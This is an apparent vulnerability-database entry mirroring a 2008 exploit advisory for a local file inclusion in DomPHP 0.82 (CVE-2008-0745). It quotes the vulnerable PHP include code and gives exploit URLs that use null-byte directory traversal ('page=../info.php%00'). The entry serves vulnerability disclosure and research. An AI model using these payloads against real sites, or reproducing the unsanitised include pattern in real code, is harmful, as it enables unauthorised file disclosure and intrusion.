Lucene search
+L

DomPHP 0.82 - 'index.php' Local File Inclusion

🗓️ 09 Feb 2008 00:00:00Reported by HoussamixType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

DomPHP 0.82 Local File Inclusion vulnerability by H-T Tea

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2008-0745
13 Feb 200819:00
cve
Cvelist
CVE-2008-0745
13 Feb 200819:00
cvelist
EUVD
EUVD-2008-0755
7 Oct 202500:30
euvd
NVD
CVE-2008-0745
13 Feb 200820:00
nvd
Prion
Directory traversal
13 Feb 200820:00
prion
-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix From H-T Team

= Script : DomPHP 0.82
= Download :  http://www.domphp.com/download/

= BUG : Local File Inclusion

=  Vulnerable CODE :
~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~
if (isset($_GET['page'])) {
	// On supprime le http:// si tentative de fraude.
	$page = str_replace("http://","",$_GET['page']);
	include("../aides/".$page.".html");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

= Exploit :
http://Target/[path]/aides/index.php?page=[LFI]%00

= Get phpinfo =>  http://Target/[path]/info.php
                http://Target/[path]/aides/index.php?page=../info.php%00

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

# milw0rm.com [2008-02-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Feb 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02249
39